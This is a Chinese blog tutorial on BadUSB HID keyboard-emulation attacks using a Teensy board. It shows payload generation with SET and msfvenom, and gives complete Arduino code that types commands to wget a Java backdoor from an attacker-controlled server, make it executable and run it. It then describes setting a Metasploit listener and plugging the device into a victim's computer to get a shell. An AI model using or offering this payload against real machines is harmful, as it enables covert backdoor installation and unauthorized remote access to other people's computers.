注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

抖m型丧病女仆的宅窝

专注渗透测试|无线安全|kali_linux|一个宅女的小窝

 
 
 

日志

 
 

BADUSB HID攻击  

2016-03-06 06:50:20|  分类: HID攻击 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

HID 即 Human Interface Devices 人机接口设备。HID攻击意味着模拟 HID 设备与主机通讯的攻击行为。最常见的攻击形式是模拟成USB HID设备如USB键盘。

0×01 HID 攻击原理简述

HID 即 Human Interface Devices人机接口设备。HID攻击意味着模拟 HID 设备与主机通讯的攻击行为。最常见的攻击形式是模拟成USB HID设备如USB键盘。

常见的USB HID 攻击硬件有 Teensy(及兼容Teensy的国产烧鹅)、Arduino Leonardo、USB Rubber Ducky 等。都是通过集成的USB控制芯片模拟成USB键盘\鼠标,并按照事先编程好的顺序发送按键,达到攻击的目的

0×02 烧录软件准备 Arduino,Teensy

 arduino下载地址:http://pan.baidu.com/s/1I4g0m  //根据自己不同的系统下载安装 因为我的系统是linux 以下教程全部使用kali linux 2.0演示
下载文件 即可打开
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

安装Teensy
下载地址:http://www.pjrc.com/teensy/td_download.html
把软件安装到arduino的目录就可以了
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

安装好之后打开arduino选择两个选项Tools--->board "teensy 2.0 ++--->teensy++2.0
                                                              Tools--->USBtype:"Dsik(SD Card) + keyboard--->Dsik(SD Card) + keyboard
 

0×03 硬件准备

 我使用的是Radiowar的烧鹅系列
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

0×04 生成payload的软件 Kautilya 或 SET

我反正是两个都用了 两个工具生成的代码对比+修改

 SET生成:运行setookit 依次选择1-->6
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

这里我选择6 因为我入侵我自己的linux 所以选择指定下载一个payload下来 大家根据自己的情况进行实际选择
这里我再次选择自定义文件 用msfvenom生成一个java后门并且复制到root目录下面 所以我自定义的payload的目录是/root/saya.jar

BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

 之后会在/root/.set/reports/teensy_2016-03-06 06:16:48.211983.pde这个目录里面
 
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

 把teensy_2016-03-06 06:16:48.211983.pde 改成别的名字 因为太多字符 arduino可能会打不开
 以下是我自己修改的代码 针对gnome3的linux
-----------------------------------------------萌萌哒分割线------------------------------
void setup()
{
  delay(5000);
  terminal();
  delay(3000);
  Keyboard.println("wget http://192.168.4.104/saya.jar");
  delay(3000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_F2);
  Keyboard.send_now();
  delay(3000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_F2);
  Keyboard.send_now();
  delay(3000);

  Keyboard.println("sudo chmod 777 saya.jar");
  delay(3000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_F2);
  Keyboard.send_now();
  delay(3000);
  Keyboard.println("./saya.jar");
}

void loop()
{
  
}

void terminal()
{
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_F2);
  Keyboard.send_now();

}

-----------------------------------------------萌萌哒分割线------------------------------
之后校验代码 插上Teensy设备烧录
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝
 根据我自己的代码设置 我要开启以下apache2服务并把saya.jar复制到apache2的根目录下面 之后才能wget下载到payload
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

 整个烧录/制作的过程就完成了

0x06 let's rock!!!
设置好对应的msf监听模块
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

之后把设备插到倒霉鬼的电脑里面等待返回shell
 
BADUSB HID攻击 - Saya - 抖m型丧病女仆的宅窝

视频演示地址:http://pan.baidu.com/s/1hqS1pbu
转载请注明原文地址:http://lsaya.blog.163.com
  评论这张
 
阅读(246)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017